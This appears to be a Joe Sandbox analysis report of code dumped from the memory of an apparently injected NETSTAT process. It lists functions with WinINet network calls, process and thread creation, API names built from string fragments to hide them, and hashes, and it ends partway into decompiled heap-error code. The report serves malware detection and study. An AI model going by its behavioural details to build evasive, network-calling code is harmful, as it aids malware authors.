Function 02B08C80, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 02B08CE8

Strings

Inte, xrefs: 02B08C9A
Conn, xrefs: 02B08CA8
ectA, xrefs: 02B08CAF
ConnectA, xrefs: 02B08CE2, 02B08CE7
rnetConnectA, xrefs: 02B08CDE, 02B08CE6
InternetConnectA, xrefs: 02B08CDA, 02B08CE5
rnet, xrefs: 02B08CA1

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
Instruction ID: 388c3a74f2e512cee1289aacddb3fd2f3897fdfdbd2112d71103d373201422e9
Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
Instruction Fuzzy Hash: 8F01EDB2915119AFCB14DF99D941DEF7BB9EB48310F154289BE08A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B08C10, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02B08C67

Strings

rnetOpenA, xrefs: 02B08C61, 02B08C66
InternetOpenA, xrefs: 02B08C5D, 02B08C65
Inte, xrefs: 02B08C2A
Open, xrefs: 02B08C38
rnet, xrefs: 02B08C31
A, xrefs: 02B08C3F

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
Instruction ID: ce31245996020df823509100a5acf8709881d7981551d03021c68d4695adbe15
Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
Instruction Fuzzy Hash: F6F01DB2911119AF8B14DFD8DC419EB7BB8EF48310B048589BD1897241D631AA10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B08C08, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02B08C67

Strings

rnetOpenA, xrefs: 02B08C61, 02B08C66
InternetOpenA, xrefs: 02B08C5D, 02B08C65
Inte, xrefs: 02B08C2A
Open, xrefs: 02B08C38
rnet, xrefs: 02B08C31
A, xrefs: 02B08C3F

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: f478222ad79b51b5457a03cbb74923af689d2a3c3fc5ea9f2da769c9dfa7a983
Instruction ID: d3aeffc5729372bcbc82945f8c11aae6efb54fb79bdaef66b1089f058b3c6fd1
Opcode Fuzzy Hash: f478222ad79b51b5457a03cbb74923af689d2a3c3fc5ea9f2da769c9dfa7a983
Instruction Fuzzy Hash: 96F068B1901115AFCB15DFC8DD419FF7BB9FF84310B048599EE5867241C7346A51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B08E60, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 02B08EAF

Strings

rnet, xrefs: 02B08E81
dle, xrefs: 02B08E96
eHan, xrefs: 02B08E8F
CloseHandle, xrefs: 02B08EAB, 02B08EAE
Inte, xrefs: 02B08E7A
Clos, xrefs: 02B08E88

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet
String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
API String ID: 1081599783-4067651292
Opcode ID: 2f355f32e4d236debda0520a74581a02e600a93b195680a2bc15e3eed52cf878
Instruction ID: bd46c94c0865759b10eb097f27334582ab1141d1b101db9f7b03f97d8f439078
Opcode Fuzzy Hash: 2f355f32e4d236debda0520a74581a02e600a93b195680a2bc15e3eed52cf878
Instruction Fuzzy Hash: 18F030B2D05118AF8B15DFD9D9459EFBBB8EB45310F1081C9EE486B241D6719B10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B08E58, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 30
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCloseHandle.WININET(CloseHandle,?,?,?,00000000), ref: 02B08EAF

Strings

rnet, xrefs: 02B08E81
dle, xrefs: 02B08E96
eHan, xrefs: 02B08E8F
CloseHandle, xrefs: 02B08EAB, 02B08EAE
Inte, xrefs: 02B08E7A
Clos, xrefs: 02B08E88

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet
String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
API String ID: 1081599783-4067651292
Opcode ID: af7a020fdbaed342a1f344c919080a679a933ef560d2a9d0593a4a3478827665
Instruction ID: 259e49e2bdcc43a5b47b68b3b41b4d5ab0d0d1f3179c1f946203e511bb5363f0
Opcode Fuzzy Hash: af7a020fdbaed342a1f344c919080a679a933ef560d2a9d0593a4a3478827665
Instruction Fuzzy Hash: D8F030B2C01129EB8B15DFD9D9459EE7B74EB44710F148189E9497B211D2709B00CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02B07310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02B073B8

Strings

wininet.dll, xrefs: 02B0736E, 02B07377
net.dll, xrefs: 02B07381, 02B07407, 02B073DF, 02B073EB, 02B07413

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: e6af0363ee1b584a2f693c4d3b251eb15719bc50cf573fba5c130154999ac59b
Instruction ID: 2aff662b3646c74f08ede1a6188a87139d2a7ac50877408aa6087efc5131d469
Opcode Fuzzy Hash: e6af0363ee1b584a2f693c4d3b251eb15719bc50cf573fba5c130154999ac59b
Instruction Fuzzy Hash: 98316EB6501604ABD716DF64C8E0FABFBB9EB48700F04855DFA195B280DB70B556CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B07306, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02B073B8

Strings

wininet.dll, xrefs: 02B0736E, 02B07377
net.dll, xrefs: 02B07381, 02B073DF, 02B073EB

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 5b010f6246d2d19d2a696ff9e60fd60fdb3d6c494a67668c8220a1e186317109
Instruction ID: a6145fa2ae7d3f789df0449f4efdea966385f601a1909016080b1c988010e468
Opcode Fuzzy Hash: 5b010f6246d2d19d2a696ff9e60fd60fdb3d6c494a67668c8220a1e186317109
Instruction Fuzzy Hash: F131BFB1941204ABD712EF64C8E1F6BFBB9EB48704F048199FA195B281DB70B456CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 02B07434, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02AFCD00,?,?), ref: 02B0747C

Strings

net.dll, xrefs: 02B07407, 02B07413

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: net.dll
API String ID: 2422867632-2431746569
Opcode ID: 5cbc2d340615f03ea43c2aeba58de15218dfdaff67ddeb763a559c7839244d30
Instruction ID: 0108f1ece3e358db99d70474c063e73745ad12b6d910b7f5f781b30893069116
Opcode Fuzzy Hash: 5cbc2d340615f03ea43c2aeba58de15218dfdaff67ddeb763a559c7839244d30
Instruction Fuzzy Hash: 1CF0E9776012046AD3269678E871FA7F7ECEB84311F04819FFA5E86180DB31744A8BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B088F4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02AF3B93), ref: 02B0892D

Strings

.z`, xrefs: 02B0891C, 02B08928

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 0aa8f8fe827f215ff8fd716d738020d5fd89c4b6e882f717f7bcdc75d59df5bd
Instruction ID: f7b4d8499b13690bc674834982efdc8d26f642389cdcfcba56a5c6c74e8973c3
Opcode Fuzzy Hash: 0aa8f8fe827f215ff8fd716d738020d5fd89c4b6e882f717f7bcdc75d59df5bd
Instruction Fuzzy Hash: 44E06DB12142046FDB24EF79CC98ED77BA9AF48350F118599FD09DB252D631E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B08900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02AF3B93), ref: 02B0892D

Strings

.z`, xrefs: 02B0891C, 02B08928

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: eccc1425961946efae745abc8f69d03cbb90a5d691f4a0cd49523492c38e4020
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 8CE01AB12002086BD714DF59CC88EA777ADAF88750F014554BD0857242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF7313, Relevance: 3.2, APIs: 2, Instructions: 178threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02AF72EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02AF730B

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0698ab5a3c039dcb599855d1bd0df9def66a1999906c1b260578e8f9a1f7dfe4
Instruction ID: 783e8956ae83d4d9be2e7c992242cc3644d6d10c4d9ecea81daa21daa24b868a
Opcode Fuzzy Hash: 0698ab5a3c039dcb599855d1bd0df9def66a1999906c1b260578e8f9a1f7dfe4
Instruction Fuzzy Hash: 6E61A471940309AFD765DF64DC85FABB7B8EB48304F0005ADFA5997280DB74AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02AF7290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02AF72EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02AF730B

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
Instruction ID: 6fcf5894275a5501e20a906d2fdb21f69b515ea4f2190ae4bc910a057e59e611
Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
Instruction Fuzzy Hash: 9601A731A803287AE721A6D49D42FBF776C5B00B51F040154FF04BA1C0EA9869064BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02AF9B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02AF9BC2

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: db695f4e92b2102adeada163bc9a906308e3c65f9f9d381e3b708a6f62f3f6f2
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: EC0112B5D0020DA7DB10DBE4DC81F9EB7799B54308F104595EA0897181FA75E718CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AFD437, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02AF7C93,?), ref: 02AFD46B

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3cba4c0a831f4059d8b87e6af8a02e23f8fda42de92d21b2cc7a222dc0181a5e
Instruction ID: e9b14dc00717510af7d07f2d588b9daa169ca5f833f31cb1f03092650fa9e884
Opcode Fuzzy Hash: 3cba4c0a831f4059d8b87e6af8a02e23f8fda42de92d21b2cc7a222dc0181a5e
Instruction Fuzzy Hash: 5701F971A14208BBDB14DFA8DC81FAEB799DB44750F1443A9F919D73C1DB38E6408650

Uniqueness

Uniqueness Score: -1.00%

Function 02B08970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B089C4

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 04fc5c40ae66d2d6d3c1ee05b732bb538be3ff2a66a7a7877b067e55873974b1
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 3501AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02B0896D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B089C4

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: fbfca7d9fd0272c9df7e0791daf96dc817077bd846a138c9dc3b8160cc8d5037
Instruction ID: c78e41e586abb804c6604f158704104cfdcc1910261ea3128d621b251ad2d28b
Opcode Fuzzy Hash: fbfca7d9fd0272c9df7e0791daf96dc817077bd846a138c9dc3b8160cc8d5037
Instruction Fuzzy Hash: 3B01F6B6208148BFCB04CF9CDC90DEB7BA9AF8C310F158258FA5997242C630E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B07440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02AFCD00,?,?), ref: 02B0747C

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
Instruction ID: b4839b95ec638f067a9ba9012823d048f54b19b45fa65b87e871cfe952c84275
Opcode Fuzzy Hash: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
Instruction Fuzzy Hash: 8EE06D333902143AE22165999C42FABB69CCB81B64F1401A6FA0DEA2C1D995F84146A8

Uniqueness

Uniqueness Score: -1.00%

Function 02B08938, Relevance: 1.5, APIs: 1, Instructions: 25processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B089C4

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: e263a25b9261b4ae8f15824229538849192246319409f3ce42453de4433c6f59
Instruction ID: 044f4a5319b212ce2576158adb3cbeb21bd265344ecb6e6ee458566231d4db61
Opcode Fuzzy Hash: e263a25b9261b4ae8f15824229538849192246319409f3ce42453de4433c6f59
Instruction Fuzzy Hash: 21E0B6B2254009AF8B15DF99ECC1CEB73ADEB8C614B10865DBA5CC7244C634E8268BE5

Uniqueness

Uniqueness Score: -1.00%

Function 02B08A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02AFCFD2,02AFCFD2,?,00000000,?,?), ref: 02B08A90

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 15241e8874b1615c9b4fad18be779d6afb9d84f1cd8090685d1ee0c617134b61
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 8AE01AB12002086BDB10DF49CC84EE737ADAF88650F018154BE0857242C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02B088C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02B03546,?,02B03CBF,02B03CBF,?,02B03546,?,?,?,?,?,00000000,00000000,?), ref: 02B088ED

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 284eb86ef48068a9616c7340064237473a87498479912cc0ca649325d94252ac
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 28E012B1200208ABDB14EF99CC84EA777ADAF88650F118598BE085B282C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02AFD440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02AF7C93,?), ref: 02AFD46B

Memory Dump Source

Source File: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2af0000_NETSTAT.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: dc51f19f294ce7cd1097a1e445b148407b56f97d9be28efcbe19f5b54a20e658
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: A4D052627903082AEA10AAA89C46F2672C9AB44A44F4940A4FA4AAB2C3EA64E4008561

Uniqueness

Uniqueness Score: -1.00%

Function 02EA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EA9694

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d960f066d1276f380de9326dfb943f5299e5bca0a7cbf81ad0f58843a66ce877
Instruction ID: 5431626804bba678107d529d8259a3a622f54cf2d4b59de9873ba4bfdb2db69b
Opcode Fuzzy Hash: d960f066d1276f380de9326dfb943f5299e5bca0a7cbf81ad0f58843a66ce877
Instruction Fuzzy Hash: DBB09B719414D5C6D651D7645A087577904BFD4745F16D061D1020641B477CD091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02F1B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02F1B305
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02F1B38F
*** then kb to get the faulting stack, xrefs: 02F1B51C
The resource is owned shared by %d threads, xrefs: 02F1B37E
*** Inpage error in %ws:%s, xrefs: 02F1B418
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02F1B47D
Go determine why that thread has not released the critical section., xrefs: 02F1B3C5
The instruction at %p tried to %s , xrefs: 02F1B4B6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02F1B484
read from, xrefs: 02F1B4AD, 02F1B4B2
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02F1B2DC
The resource is owned exclusively by thread %p, xrefs: 02F1B374
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02F1B53F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02F1B323
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02F1B314
a NULL pointer, xrefs: 02F1B4E0
The critical section is owned by thread %p., xrefs: 02F1B3B9
<unknown>, xrefs: 02F1B27E, 02F1B2D1, 02F1B350, 02F1B399, 02F1B417, 02F1B48E
This failed because of error %Ix., xrefs: 02F1B446
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02F1B476
*** enter .exr %p for the exception record, xrefs: 02F1B4F1
*** Resource timeout (%p) in %ws:%s, xrefs: 02F1B352
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02F1B3D6
*** A stack buffer overrun occurred in %ws:%s, xrefs: 02F1B2F3
*** An Access Violation occurred in %ws:%s, xrefs: 02F1B48F
an invalid address, %p, xrefs: 02F1B4CF
The instruction at %p referenced memory at %p., xrefs: 02F1B432
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 02F1B39B
*** enter .cxr %p for the context, xrefs: 02F1B50D
write to, xrefs: 02F1B4A6

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 379476a7af9e24a2c543cc934cd3685568d514826818f1fe6d5d6350bf075713
Instruction ID: b251b5f7715e76c4b02914a14efc3b1b97e33ba816e5d87c1a5e60b4b95d8168
Opcode Fuzzy Hash: 379476a7af9e24a2c543cc934cd3685568d514826818f1fe6d5d6350bf075713
Instruction Fuzzy Hash: E8812435A80220FFEB256F05CC46E6B3F26AF66B99F80D044FA052B152D3A59451DFB2

Uniqueness

Uniqueness Score: -1.00%

Function 02F21C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E02F21C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x2e448a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02E6B150();
				} else {
					E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x2f5589c);
				E02E6B150("Heap error detected at %p (heap handle %p)\n",  *0x2f558a0);
				_t27 =  *0x2f55898; // 0x0
